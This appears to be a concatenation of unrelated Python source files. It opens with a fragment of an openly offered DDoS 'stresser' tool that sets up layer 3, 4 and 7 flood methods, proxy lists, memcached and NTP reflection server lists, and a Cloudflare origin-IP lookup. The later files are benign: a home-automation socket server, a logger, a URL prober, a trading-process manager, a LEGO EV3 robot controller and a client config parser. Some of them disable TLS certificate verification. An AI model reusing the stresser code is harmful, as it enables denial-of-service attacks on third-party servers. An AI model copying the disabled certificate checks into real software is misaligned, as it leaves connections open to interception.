elif tool == "check":
check(domain)
elif tool == "ping":
piger(domain)
elif tool == "dstat":
address = requests.get('http://ipinfo.io/ip', headers={"User-Agent": UserAgent, }).text
print('now please attack to {address}')
os.system('dstat')
else:
print('tool not found')
toolgui()
except IndexError:
toolgui()
def cfip(domain):
if str("http") in str(domain):
domain = domain.replace('https://', '').replace('http:', '').replace('/')
URL = "http://www.crimeflare.org:82/cgi-bin/cfsearch.cgi"
r = requests.post(URL, data={"cfS": {domain}}, headers={"User-Agent": UserAgent, }, timeout=1)
print(r.text)
def check(domain):
if str("http") not in str(domain):
domain = "http://" + domain
print('please wait ...')
r = requests.get(domain, timeout=20)
if str("50") in str(r.status_code):
die = "OFFLINE"
else:
die = "ONLINE"
print('\nstatus_code: '+r.status_code)
print('status: '+die+'\n')
def piger(siye):
if str("https") in str(siye):
domain = str(siye).replace('https', '').replace('/', '').replace(':', '')
elif str("http") in str(siye):
domain = str(siye).replace('http', '').replace('/', '').replace(':', '')
else:
domain = str(siye)
print('please wait ...')
r = pig(domain, count=5, interval=0.2)
if r.is_alive:
die = "ONLINE"
else:
die = "OFFLINE"
print('\nAddress: '+r.address)
print('Ping: '+r.avg_rtt)
print('Aceepted Packets: '+r.packets_received+'/'+r.packets_sent)
print('status: '+die+'\n')
def usgeaseets():
global metho, url, SOCKST, thr, proxylist, muli, tim, l7s, l4s, tos, ots, l3s
socks = ["1", "4", "5"]
sockst = ["socks4.txt", "socks5.txt", "http.txt"]
try:
if sys.argv[3] not in socks:
SOCKST = Choice(socks)
elif sys.argv[3]:
SOCKST = sys.argv[3]
else:
SOCKST = Choice(socks)
except:
SOCKST = Choice(socks)
if (str(SOCKST) == str('1')):
proxylist = "http.txt"
else:
proxylist = "socks{0}.txt".format(SOCKST)
try:
met = str(sys.argv[1]).upper()
if met not in list(methods):
metho = Choice(methods).lower()
elif sys.argv[1]:
metho = sys.argv[1]
else:
metho = Choice(methods).lower()
except:
metho = Choice(methods).lower()
try:
methos = metho.upper()
if (methos in l4) or (methos in l3):
url = sys.argv[2]
elif str("http") not in sys.argv[2]:
url = "https://example.ir"
elif sys.argv[2]:
url = sys.argv[2]
else:
url = "https://example.ir"
except:
url = "https://example.ir"
try:
if sys.argv[4]:
thr = sys.argv[4]
else:
thr = Intn(100, 1000)
except:
thr = Intn(10, 1000)
try:
if (sys.argv[5] not in sockst):
exit()
except IndexError:
pass
except:
print('socks type not found')
exit()
try:
if sys.argv[6]:
muli = sys.argv[6]
else:
muli = Intn(5, 100)
except:
muli = Intn(5, 100)
try:
if sys.argv[7]:
tim = sys.argv[7]
else:
tim = Intn(10, 10000)
except:
tim = Intn(10, 10000)
l4s = str(l4).replace("'", "").replace("[", "").replace("]", "")
l3s = str(l3).replace("'", "").replace("[", "").replace("]", "")
l7s = str(l7).replace("'", "").replace("[", "").replace("]", "")
tos = str(to).replace("'", "").replace("[", "").replace("]", "")
ots = str(ot).replace("'", "").replace("[", "").replace("]", "")
def usge():
usgeaseets()
print('* Coded By MH_ProDev For Better Stresser')
print('python3 {} <method> <url> <socks_type5.4.1> <threads> <proxylist> <multiple> <timer>\n'.format(sys.argv[0]))
print(' > Methods:')
print(' - L3')
print(' | {} | {} Methods'.format(l3s, len(l3)))
print(' - L4')
print(' | {} | {} Methods'.format(l4s, len(l4)))
print(' - L7')
print(' | {} | {} Methods'.format(l7s, len(l7)))
print(' - TOOLS')
print(' | {} | {} Methods'.format(tos, len(to)))
print(' - Other')
print(' | {} | {} Methods'.format(ots, len(ot)))
print(' - All {} Method \n'.format(len(methodsl)))
print(
'expmple:\n python3 {} {} {} {} {} {} {} {}'.format(sys.argv[0], metho, url, SOCKST, thr, proxylist, muli, tim))
def makefile(text):
if text == "files/":
os.mkdir(text)
elif text == "files/proxys/":
os.mkdir(text)
else:
open(text, 'w').close()
print('File: ', text)
if __name__ == '__main__':
try:
import requests, socket, socks, time, random, threading, sys, ssl, datetime, cfscrape, re
from time import sleep
from icmplib import ping as pig
from scapy.layers.inet import TCP
from scapy.all import *
from socket import gaierror
except:
if (os.name == "nt"):
os.system('python -m pip install -r requirements.txt')
else:
os.system('python3 -m pip install -r requirements.txt')
try:
import requests, socket, socks, time, random, threading, sys, ssl, datetime, cfscrape, re
from time import sleep
from icmplib import ping as pig
from scapy.layers.inet import TCP
from scapy.all import *
from socket import gaierror
except:
print("Error when install requirements package!")
exit()
acceptall = [
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate",
"Accept-Encoding: gzip, deflate",
"Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate",
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Charset: iso-8859-1Accept-Encoding: gzip",
"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5Accept-Charset: iso-8859-1",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1Accept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1Accept-Charset: utf-8, iso-8859-1;q=0.5",
"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*Accept-Language: en-US,en;q=0.5",
"Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Encoding: gzipAccept-Charset: utf-8, iso-8859-1;q=0.5Accept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1",
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Encoding: gzipAccept-Language: en-US,en;q=0.5Accept-Charset: utf-8, iso-8859-1;q=0.5,"
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8Accept-Language: en-US,en;q=0.5",
"Accept-Charset: utf-8, iso-8859-1;q=0.5Accept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1",
"Accept: text/html, application/xhtml+xml",
"Accept-Language: en-US,en;q=0.5",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1",
"Accept: text/plain;q=0.8,image/png,*/*;q=0.5Accept-Charset: iso-8859-1",
]
data = ""
strings = "asdfghjklqwertyuiopZXCVBNMQWERTYUIOPASDFGHJKLzxcvbnm1234567890"
Intn = random.randint
Choice = random.choice
if not os.path.exists('files/'):
makefile('files/')
if not os.path.exists('files/proxys/'):
makefile('files/proxys/')
if not os.path.exists('files/useragent.txt'):
makefile('files/proxys/useragent.txt')
if not os.path.exists('files/ntp_servers.txt'):
makefile('files/ntp_servers.txt')
if not os.path.exists('files/memcached_servers.txt'):
makefile('files/memcached_servers.txt')
if not os.path.exists('files/referers.txt'):
makefile('files/referers.txt')
try:
with open("files/useragent.txt", "r") as f:
readuser = str(f.readlines()).replace('\n', '').replace('\r', '')
with open("files/referers.txt", "r") as f:
readref = str(f.readlines()).replace('\n', '').replace('\r', '')
with open("files/memcached_servers.txt", "r") as f:
memsv = str(f.readlines()).replace('\n', '').replace('\r', '')
with open("files/ntp_servers.txt", "r") as f:
ntpsv = str(f.readlines()).replace('\n', '').replace('\r', '')
UserAgent = Choice(readuser)
referers = Choice(readref)
memcached_servers = Choice(memsv)
try:
bdr = str(sys.argv[1]).lower()
if bdr == "tools":
tools()
elif bdr == "stop":
stop()
elif bdr == "help":
usge()
elif len(sys.argv) <= int(7):
usge()
else:
main()
except IndexError:
usge()
except KeyboardInterrupt:
sys.exit()
except IndexError:
usge()
|
server.py
|
#!/usr/bin/python
import socket, ssl
import json
import sys
import requests
import ConfigParser
import argparse
import threading
from avbmsg import AVBMessage
"""
This is the underlying data format that AVBMessage wraps in a header
and optionally encrypts. The various fields are as follows:
id: The numeric device id we want to interact with
action: A block that specifies the type of action and attribute data
(only used for "set" action type)
type: Type of action, currently support get/set/run
- "get" - returns information about the device
- "set" - sets the specified attributes to the specified values
- "run" - only applies to scenes
attribute: The only valid attribute is "power" for on/off type devices
JSON message format example (Client->Server):
{
"id": 1,
"action":
{
"type": "set", (Also "get", "run")
"attribute":
{
"power": 1
}
}
}
status: 0 indicates success, 1 an error, 2 simulated mode
err_str: a string indicating what failed that Alexa will dictate
id: the device id
data: data returned for a "get" action type
JSON message format example (Server->Client):
{
"status": 0,
"err_str": null,
"id": 1,
"data":
{
"status": "1",
"name": "Bedroom Outlet"
}
}
"""
def handle_msg(s, vera_ip, vera_port, msg, psk):
print 'got msg: ' + msg.dumps()
resp_data = None
# Create the message to send the response
if psk is not None:
resp = AVBMessage(encoding=AVBMessage.ENC_AES_CBC, psk=psk)
else:
resp = AVBMessage()
# Parse the received message.
data = msg.get_data()
if data == None:
print 'Failed to decode message!'
resp_data = {'status': 1, 'err_str': 'bad message format', 'data': None}
resp.set_data(resp_data)
s.sendall(resp.dumps())
return False
# Turn message into appropriate Vera action
# Currently, we support 3 types of actions (get/set/run). Get/set apply to
# devices while run applies to scenes
obj_id = data['id']
action = data['action']['type']
if action == 'run':
vera_params = {'id':'lu_action', 'output_format':'json',
'SceneNum':str(obj_id),
'serviceId':'urn:micasaverde-com:serviceId:HomeAutomationGateway1',
'action':'RunScene'
}
elif action == 'set':
vera_params = {'id':'lu_action', 'output_format':'json',
'DeviceNum':str(obj_id),
'serviceId':'urn:upnp-org:serviceId:SwitchPower1',
'action':'SetTarget',
'newTargetValue': str(data['action']['attribute']['power'])
}
elif action == 'get':
vera_params = {'id':'status'}
else:
print 'invalid action'
resp_data = {'status': 1, 'err_str': 'invalid action', 'data': None}
resp.set_data(resp_data)
s.sendall(resp.dumps())
return False
if vera_ip is not None:
# Send the appropriate HTTP request to Vera
dest = 'http://' + vera_ip + ':' + vera_port + '/data_request'
print
print 'sending to: ' + dest
print 'params: ' + str(vera_params)
print
try:
r = requests.get(dest, params=vera_params)
except requests.exceptions.RequestException as e:
print e
resp_data = {'status': 2, 'err_str': 'requests exception', 'data': None}
resp.set_data(resp_data)
s.sendall(resp.dumps())
return False
if r.status_code != 200:
print 'Non-200 response from Vera'
print 'Code: ' + str(r.status_code)
resp_data = {'status': 2, 'err_str': 'bad response from Vera', 'data': None}
resp.set_data(resp_data)
s.sendall(resp.dumps())
return False
# Get the returned JSON from Vera (only for 'get' action)
if action == 'get':
status = r.json()
verastate = 'unknown'
veraname = 'unknown'
for dev in status['devices']:
if dev['id'] == obj_id:
for state in dev['states']:
if state['variable'] == 'Status':
verastate = state['value']
if state['variable'] == 'ConfiguredName':
veraname = state['value']
resp_data = {'status': 0, 'err_str': None, 'data': {'status':verastate, 'name':veraname}}
else:
resp_data = {'status': 0, 'err_str': None, 'data': None}
# Send the response
resp.set_data(resp_data)
print 'sending: ' + resp.dumps()
s.sendall(resp.dumps())
else:
# Send the simulated response (echo received data back)
resp_data = {'status': 2, 'err_str': 'vera simulation', 'data': data}
resp.set_data(resp_data)
print 'sending: ' + resp.dumps()
s.sendall(resp.dumps())
return True
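# For reference (values are illustrative, not from the source): a 'set' action
# on device id 7 with power=1 results in an HTTP GET equivalent to
#   http://<vera_ip>:<vera_port>/data_request?id=lu_action&output_format=json
#     &DeviceNum=7&serviceId=urn:upnp-org:serviceId:SwitchPower1
#     &action=SetTarget&newTargetValue=1
# while 'run' uses SceneNum with the HomeAutomationGateway1 service instead.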
# Entry point for new thread to handle specific client connection
def client_thread(secure_s, ip, port, psk):
if psk is not None:
m = AVBMessage(encoding=AVBMessage.ENC_AES_CBC, psk=psk)
else:
m = AVBMessage()
# Set the socket timeout. This will prevent a client from opening a connection
# and just sitting there, consuming resources. If no message is received within
# the timeout then an exception is raised and the thread will terminate
secure_s.settimeout(5.0)
while True:
# Get a new message header
chunks = []
nb = 0
while nb < AVBMessage.HEADER_SIZE:
try:
chunk = secure_s.recv(AVBMessage.HEADER_SIZE - nb)
except (socket.timeout, ssl.SSLError) as e:
print 'recv error: ' + str(e)
# Note that we issue a shutdown() here to notify the other end
# that we're closing the connection. If we just close(), the recv() on
# the client side will block forever
secure_s.shutdown(socket.SHUT_RDWR)
secure_s.close()
return
if chunk == '':
print 'connection broken or closed by client'
secure_s.close()
return
chunks.append(chunk)
nb += len(chunk)
msg = ''.join(chunks)
# Get the length and wait for the rest
m.loads(msg)
while nb < m.len():
try:
chunk = secure_s.recv(min(m.len() - nb, 1024))
except (socket.timeout, ssl.SSLError) as e:
print 'recv error: ' + str(e)
secure_s.shutdown(socket.SHUT_RDWR)
secure_s.close()
return
if chunk == '':
print 'connection broken or closed by client'
secure_s.close()
return
chunks.append(chunk)
nb += len(chunk)
msg = ''.join(chunks)
# Handle the message
# Pass in IP address and port of vera (as strings). These are used to form
# the URL to send the request to Vera.
m.loads(msg)
if not handle_msg(secure_s, ip, str(port), m, psk):
print 'error handling message, server closing connection'
secure_s.close()
return
def main():
# Read the configuration file
cfg = ConfigParser.RawConfigParser()
# If the user provides a file use that, otherwise use the default
parser = argparse.ArgumentParser()
parser.add_argument('--config', help='path to server config file')
parser.add_argument('--no-vera', action='store_true', help='switch to not send anything to Vera')
args = parser.parse_args()
cfg_file = './server.cfg'
if args.config is not None:
cfg_file = args.config
try:
cfg.readfp( open(cfg_file) )
except:
print 'error reading configuration file: ' + cfg_file
sys.exit()
# Setup the defaults
port = 3000
vera_port = 3480
# Make sure we have the required sections in the config file
if cfg.has_section('vera'):
if cfg.has_option('vera', 'ip'):
vera_ip = cfg.get('vera', 'ip')
else:
print 'missing Vera IP address'
sys.exit()
if cfg.has_option('vera', 'port'):
vera_port = cfg.getint('vera', 'port')
else:
print 'missing [vera] section in configuration file'
sys.exit()
if cfg.has_option('server', 'port'):
port = cfg.getint('server', 'port')
# See what security options are specified in the config file
# Valid combinations are:
# 1) none - just do regular connection (INSECURE)
# 2) just the section - use ssl/tls but with no auth
# 3) root_ca plus client cert/key- give out certificate to client
# Optionally, if psk is specified then we will use it to encrypt the message body
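    # For illustration only: given the options read below, a server.cfg that
    # enables mutual-auth TLS plus a PSK for message-body encryption might look
    # like the following (all paths and addresses are made-up examples):
    #
    #   [server]
    #   port = 3000
    #
    #   [vera]
    #   ip = 192.168.1.10
    #   port = 3480
    #
    #   [security]
    #   root_ca = ./certs/rootCA.pem
    #   cert = ./certs/server.crt
    #   key = ./certs/server.key
    #   psk = ./certs/psk.txt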
security = 'none'
psk = None
if cfg.has_section('security'):
security = 'ssl'
if cfg.has_option('security', 'root_ca') and cfg.has_option('security', 'cert') and cfg.has_option('security', 'key'):
security = 'ssl_mutual_auth'
root_ca = cfg.get('security', 'root_ca')
cert = cfg.get('security', 'cert')
key = cfg.get('security', 'key')
if cfg.has_option('security', 'psk'):
try:
f = open(cfg.get('security', 'psk'), 'r')
# Note that the newline gets read, so we need to strip it
psk = f.read().rstrip('\n')
f.close()
except IOError as e:
print 'I/O error({0}): {1}'.format(e.errno, e.strerror)
psk = None
print ('configuring server security profile as "' + security + '"')
if psk is not None:
print ('using PSK from ' + cfg.get('security', 'psk'))
# Open up the port and listen for connections
# Create the socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the socket to the port
print 'starting server on ' + socket.gethostname() + ':' + str(port)
print
# Do some error checking as binds can fail if the port is being used by
# someone else
try:
s.bind(('', port))
except socket.error as msg:
print 'socket bind() failed!'
print '(err ' + str(msg[0]) + '): ' + msg[1]
sys.exit()
# start listening (with max 5 connections queued)
s.listen(5)
# Setup the SSL context based on assets provided in the config file
if security == 'none':
# No need to create an SSL context
pass
elif security == 'ssl':
# Setting recommended for max compatibility. Note however that SSLv2
# and v3 are not considered secure.
# See: https://docs.python.org/2/library/ssl.html
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.set_ciphers('HIGH')
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
elif security == 'ssl_mutual_auth':
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
context.load_verify_locations(root_ca)
context.verify_mode = ssl.CERT_REQUIRED
context.load_cert_chain(certfile=cert, keyfile=key)
# If the switch to turn off Vera communication was specified we will
# overwrite the vera_ip with None
if args.no_vera:
print 'Vera communication disabled.'
vera_ip = None
# Now that the server is listening, we can enter our main loop where we
# wait for connections
while True:
print 'waiting for connection...'
# accept() will block until a client has tried to connect
(new_s, addr) = s.accept()
print 'connection from ' + addr[0] + ':' + str(addr[1])
# Wrap the socket in our SSL context to protect communications
if security == 'none':
secure_s = new_s
else:
secure_s = context.wrap_socket(new_s, server_side=True)
# Kick off a thread to handle the new client
t = threading.Thread(target=client_thread, args=(secure_s, vera_ip, vera_port, psk,))
t.start()
if __name__ == '__main__':
main()
|
logger.py
|
import time, datetime, pytz
import threading
class Logger(object):
@staticmethod
def log(text: str):
threading.Thread(target=Logger._logtask,args=(text,)).start()
@staticmethod
def _logtask(text: str):
t = '[ '+ datetime.datetime.now(pytz.timezone('Europe/Warsaw')).strftime("%Y-%m-%d %H:%M:%S")+' ] '
print(t+str(text))
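# Usage sketch (illustrative): Logger.log("service started") prints the message
# prefixed with a Europe/Warsaw timestamp from a short-lived background thread,
# so the caller is never blocked by the print itself.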
|
webprobe.py
|
import threading
import requests
import argparse
from time import sleep
"""ArgParse for CLI input"""
parser=argparse.ArgumentParser(description='WebProbe V0.1')
parser.add_argument('-f','--filename',type=str,required=True,help="Specify filename.")
parser.add_argument('-t','--threads',type=int,const=5,nargs='?',help="Specify No.of threads to spawn (default = 5)")
args = parser.parse_args()
"""Supressing warning caused by requests"""
requests.packages.urllib3.disable_warnings()
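# Example invocation (the input file name is an assumption): probe one URL per
# line of urls.txt with up to 10 concurrent threads:
#
#   python3 webprobe.py -f urls.txt -t 10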
def do_request(url):
""" Post request to the site
print the url to console if response is 200
"""
if not url: return
try:
response = requests.get(url, verify=False, allow_redirects=False, timeout=1)
print(url) #if response.ok else print(f"response: {response.status_code} url: {url}")
except Exception as e:
pass
def process_file(fname, t):
""" Thread Implementation """
fp = open(fname,'rt')
arr = list(map(lambda a : a.strip(), fp.readlines()))
for each in arr:
req = threading.Thread(target=do_request, args=(each,))
#print(threading.active_count())
while threading.active_count() >=t:
sleep(0.1)
# Needs to be changed
req.start()
fp.close()
if __name__=="__main__":
try:
        if args.threads is None:
threads_c=5
else:
threads_c=args.threads
#print(15*"="+"\nFile Name : {}\nThread Count : {}\n".format(args.filename,threads_c)+15*"="+"\n")
process_file(args.filename, threads_c)
except Exception as err:
print("\33[031mError !!\33[0m\n \n{}".format(err))
|
hickey.py
|
import os
import platform
from multiprocessing import Process
from datetime import datetime
from inspect import isfunction
from time import sleep
now = datetime.now()
def auth_time(current):
if (current - now).seconds < 10:
return True
elif 10 <= (current - now).seconds <= 20:
return False
elif (current - now).seconds > 20:
return True
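# Note on auth_time() above: relative to module import time it reports an "open"
# trading window for the first 10 seconds, a "closed" window for the next 10,
# and open again afterwards, which is just enough to exercise the start/kill
# logic in start_all() below.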
def run_all_app(app_func):
app_func()
def printme():
while True:
print("I AM RUNNING STRATEGY")
sleep(1)
def start_all(app_func, info=True, interface="ctp", in_front=300):
"""
    Start the process manager.
    * app_func: the function that creates the app
    * interface: interface name
    * in_front: how many seconds before the market opens to start and log in. Unit: seconds
"""
print("""
Ctpbee 7*24 Manager started !
    Warning: the program will start automatically at trade time ....
Hope you will have a good profit ^_^
""")
if not isfunction(app_func):
raise TypeError(f"请检查你传入的app_func是否是创建app的函数, 而不是{type(app_func)}")
p = None
while True:
current = datetime.now()
status = auth_time(current)
print(f"time: {current} auth status: {status}")
if p is None and status:
p = Process(target=run_all_app, args=(app_func,), daemon=True)
p.start()
print(f"program start successful, pid: {p.pid}")
if not status and p is not None:
print(f"invalid time, 查杀子进程 pid: {p.pid}")
if platform.uname().system == "Windows":
os.popen('taskkill /F /pid ' + str(p.pid))
else:
import signal
os.kill(p.pid, signal.SIGKILL)
p = None
sleep(1)
if __name__ == '__main__':
start_all(printme)
|
Main.py
|
#!/usr/bin/env python3
print("Inicializando...", end=' \r')
import time
# from ev3dev.ev3 import *
print("ev3dev.ev3", end=' \r')
from ev3dev2.motor import OUTPUT_A, OUTPUT_B, MoveTank, SpeedPercent
print("motores importados", end=' \r')
from ev3dev2.sensor.lego import ColorSensor,UltrasonicSensor
from ev3dev2.sensor import INPUT_1, INPUT_2, INPUT_3
print("Sensores importados", end=' \r')
from threading import Thread
from math import sqrt
import pickle
print("threading, math e pickle importados", end=' \r')
time.sleep(1)
print("Importacoes concluidas!", end=' \r')
#GLOBAL VARIABLE DECLARATIONS
rodas=MoveTank(OUTPUT_A,OUTPUT_B)
quads = []
orientacao = 0
memoria_cor= {}
cor_atual=""
tentativa=0
start_time=0
c=""
mochila=0
cores = pickle.load(open("Cores.p", "rb"))
Sensor_direita = ColorSensor(INPUT_2)
Sensor_esquerda = ColorSensor(INPUT_1)
Sensor_direita.mode = Sensor_direita.MODE_RGB_RAW
Sensor_esquerda.mode = Sensor_esquerda.MODE_RGB_RAW
Sensor_sonic = UltrasonicSensor(INPUT_3)
Sensor_sonic.mode=Sensor_sonic.MODE_US_DIST_CM
print("Declarando tudo!", end=' \r')
#LOCOMOTION FUNCTIONS
def retorno(t):#drive back to the last reference point
global tentativa,start_time,c,cor_atual
    #print ('saw black')
while c!=cor_atual:
rodas.on(15,15)
if c== cor_atual: Confirmar_cor(c)
    rodas.off()
    time.sleep(0.2)#pause to stop in the middle of the square
rodas.on_for_seconds(15,15,0.6)
rodas.off()
    #rodas.on_for_seconds(20,20,t)#drive back to the last reference point
    tentativa+=1#record that a failed attempt was made
    cor=c
    procurar_proximo()#turn according to the orientations that are still possible
    start_time = time.time()#reset the timer
    alinha(0.02,230,30)#move forward a bit so the robot does not treat the same reference point as a new one
def sair_da_cor_atual():#TO BE REPLACED BY THE ALIGNMENT ROUTINE
global c
while c!='White':
rodas.on(-20,-20)
rodas.off()
def alinha(Kp,target,margem):
global e,d
erroE=1
erroD=1
#rodas.on_for_seconds(-20,-20,0.8)
if c == 'White':
while c=='White':
rodas.on(15,15)
rodas.off()
else:
while c!='White':
rodas.on(-15,-15)
rodas.off()
while(erroE != 0 or erroD != 0) :
atualD = d[0]+d[1]+d[2]
erroD=atualD - target
if abs(erroD)<margem:
erroD=0
outputD = erroD* Kp
atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
erroE=atualE - target
if abs(erroE)<margem:
erroE=0
outputE = erroE* Kp
if outputE>40:
outputE = 40
elif outputE<-40:
outputE=-40
if outputD>40:
outputD = 40
if erroE == 0 and erroD == 0:
rodas.off()
else:
rodas.on(outputE,outputD)
# while c!='White':
# rodas.on(-20,-20)
# rodas.off()
def andar_frente():#TODO: adjust all the timings here for the final robot and track
    global cor_atual,start_time,quads,c
    #Drive forward until Black is seen; return the elapsed time
while 1:
if(c=="Black"):
rodas.off()
            return (time.time()-start_time)#FIX THIS CALCULATION SO THE COUNT STARTS FROM THE MIDDLE OF THE COLORED SQUARE
elif c!="White" and c!="Black" and start_time != 0:
if(Confirmar_cor(c)):
verificar_plaza()
rodas.off()
            return (time.time()-start_time)#if an indicator color is found, return the time between points and stop driving
elif c!="White" and c!="Black" and start_time==0:
cor_atual=c
#print(cor_atual)
time.sleep(2.15)
            procurar_proximo()#turn if white is seen, start the timer and keep driving forward
start_time = time.time()
alinha(0.02,230,30)
            #align (remember to subtract the alignment time from start_time)
while c=='White':
                #Drive on white looking for the passenger if the backpack is empty (mochila==0); otherwise just keep driving forward on white
procurar_passageiro()
def virar(graus):#turn relative to the current heading
if graus<0:
rodas.on_for_seconds(-50,50,abs(graus)*(0.40/90))
elif(graus==0): pass
else:
rodas.on_for_seconds(50,-50,abs(graus)*(0.40/90))
def procurar_proximo():#turn according to what has been learned, or the lack of it
global tentativa,cor_atual,orientacao
if (cor_atual not in memoria_cor.keys()):
if (90 not in memoria_cor.values() and tentativa == 0):
#print ('tentativa0')
virar(90)
orientacao = 90
if(90 in memoria_cor.values()):
tentativa=1
if (0 not in memoria_cor.values() and tentativa == 1):
virar(-90)
#print ('tentativa1')
orientacao = 0
if(0 in memoria_cor.values() and 90 not in memoria_cor.values() and tentativa==1):
tentativa=2
virar(-90)
if (-90 not in memoria_cor.values() and tentativa == 2):
#print ('tentativa2')
virar(-90)
orientacao = -90
else:
virar(memoria_cor[cor_atual])
#END OF LOCOMOTION FUNCTIONS
#COLOR FUNCTIONS
def media(leitura1, leitura2): # AVERAGES THE READINGS OF BOTH SENSORS, DO NOT USE FOR ALIGNMENT
media = []
for x in range(3):
media.append((leitura1[x]+leitura2[x])/2)
return tuple(media)
def cor_mais_proxima(leitura):
global cores
min = 1000
for valor in cores.values():
        # Euclidean distance between the sensor reading given as input and the previously calibrated color values
dist = sqrt(((leitura[0]-valor[0])**2) +
((leitura[1]-valor[1])**2)+((leitura[2]-valor[2])**2))
        if(dist < min):  # check whether it is smaller than the smallest seen so far
min = dist
            for key, value in cores.items():  # get the name of the color that produced the smallest distance
if value == valor:
cor = key
return cor
def diferente_de(*cor):
global c
if c not in cor:
return 1
else: return 0
def cor_th():
global c,e,d
while(1):
c=cor_mais_proxima(Sensor_direita.rgb)
d=Sensor_direita.rgb
c=cor_mais_proxima(Sensor_direita.rgb)
c=cor_mais_proxima(Sensor_direita.rgb)
def Confirmar_cor(cor_vista):
global c
time.sleep(0.08)
if(c==cor_vista):return True
else:return False
#END OF COLOR FUNCTIONS
#PLAZA FUNCTIONS
def verificar_plaza():
global c,mochila
if c!='Black':
mudanca = 0
cor_momento = c
goiaba = Thread(target=rodas.on_for_seconds, args=(-15, -15, 2.17,))
goiaba.start()
while(goiaba.is_alive()):
if (cor_momento != c):
mudanca += 1
cor_momento = c
if(mudanca >= 3):
tempo=time.time()
while(c!='Black'):
rodas.on(-20,-20)
rodas.off()
            time.sleep(3)#drop off the passenger figure
mochila=0
rodas.on_for_seconds(20,20,(tempo-time.time()))
virar(180)
            volta()
# print("PLAZA")
else:pass
# print(" NAO PLAZA")
goiaba.join()
rodas.off()
def volta():
global quads,mochila
i=len(quads)-1
while(i>0 and mochila==0):
virar(memoria_cor[quads[i].cor]*-1)
        alinha(0.02,230,30)  # alinha() requires (Kp, target, margem); values taken from the other call sites
procurar_passageiro()
time.sleep(2.17)
if(mochila==1 ):
virar(180)
            while(c!='White'):rodas.on(-20,-20)
rodas.off()
break
i-=1
        #align
        #if the sensor detects something, return start_time and run the routine to pick up the figure
if(i==0):virar(180)
rodas.off()
#END OF PLAZA FUNCTIONS
#BACKPACK FUNCTIONS (MECHANISM FOR CAPTURING THE FIGURE)
def procurar_passageiro():
global mochila,c
while c == 'White':
rodas.on(-15,-15)
if Sensor_sonic.distance_centimeters<25 and mochila==0:
            time.sleep(0.3)#tune so the robot stops with its center of rotation aligned with the detected figure
rodas.off()
dist=Sensor_sonic.distance_centimeters
virar(90)
            rodas.on_for_seconds(-20,-20,dist*0.048)#tune this value so the robot picks up the figure
time.sleep(1)
mochila=1
rodas.on_for_seconds(20,20,dist*0.048)
virar(-90)
rodas.off()
#END OF BACKPACK FUNCTIONS
#INFORMATION FUNCTIONS
class quad:#object that stores information about a reference point that was found
def __init__(self,cor,tempo,orientacao):
self.cor = cor
self.tempo = tempo
self.orientacao=orientacao
#END OF INFORMATION FUNCTIONS
print("Vamos comecar!", end=' \r')
if __name__=="__main__":
start_time=0
# _thread.start_new_thread(cor_th)
ver_cor = Thread(target=cor_th)
ver_cor.daemon=True
ver_cor.start()
time.sleep(0.5)
while (1):
tempo = andar_frente()
        if (c=='Black'):#if Black is seen, drive back to the reference point it came from
retorno(tempo)
        # if a new reference point is seen, update the memory for that color and store information about the discovered point and the last one linked to it
if (diferente_de("White", "Black")):
            tentativa=0#reset the attempt counter, indicating this is a new square
memoria_cor[cor_atual]=orientacao
quads.append(quad(cor_atual,tempo,orientacao))
orientacao=0
            start_time=0#reset the timer
##print('achou novo')
|
Client.py
|
#!/usr/bin/env python
import os
import socket
import colorama
from threading import Thread
from AESCipher import AESCipher
from Cryptodome.PublicKey import RSA
from Cryptodome.Cipher import PKCS1_OAEP
import ast
import urllib.request
import shutil
import configparser
import argparse
def parse_config():
global publicKeyFile, port, do_encrypt, server_address, key_length, debug
publicKeyFile_default = 'public.pem'
port_default = 5006
do_encrypt_default = False
server_address_default = '127.0.0.1'
key_length_default = 16
debug_default = False
config_file_default = 'client.ini'
config = configparser.ConfigParser()
config.read(config_file)
section = "Client"
try:
config_client = config[section]
except:
publicKeyFile = publicKeyFile_default
port = port_default
do_encrypt = do_encrypt_default
server_address = server_address_default
key_length = key_length_default
debug = debug_default
if config_file != config_file_default:
print("\nSomething wrong with config file ({}).\n".format(config_file))
return
errorWith = []
publicKeyFile = config_client.get('publickeyfile', publicKeyFile_default)
try:
port = config_client.getint('port', port_default)
except:
errorWith.append('port')
port = port_default
try:
do_encrypt = config_client.getboolean('encrypt', do_encrypt_default)
except:
errorWith.append('encrypt')
do_encrypt = do_encrypt_default
server_address = config_client.get('serveraddress', server_address_default)
valid_key_lengths = [16, 24, 32]
try:
key_length = config_client.getint('keylength', key_length_default)
except:
errorWith.append('keylength')
key_length = key_length_default
if not key_length in valid_key_lengths:
key_length = key_length_default
errorWith.append('keylength')
try:
debug = config_client.getboolean('debug', debug_default)
except:
errorWith.append('debug')
debug = debug_default
print('Errors with loading [{}] from config file.'.format(', '.join(errorWith)) * bool(len(errorWith)))
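# For reference, a minimal client.ini covering the options read above could look
# like this (every value is an illustrative assumption, not a requirement):
#
#   [Client]
#   publickeyfile = public.pem
#   port = 5006
#   encrypt = true
#   serveraddress = 127.0.0.1
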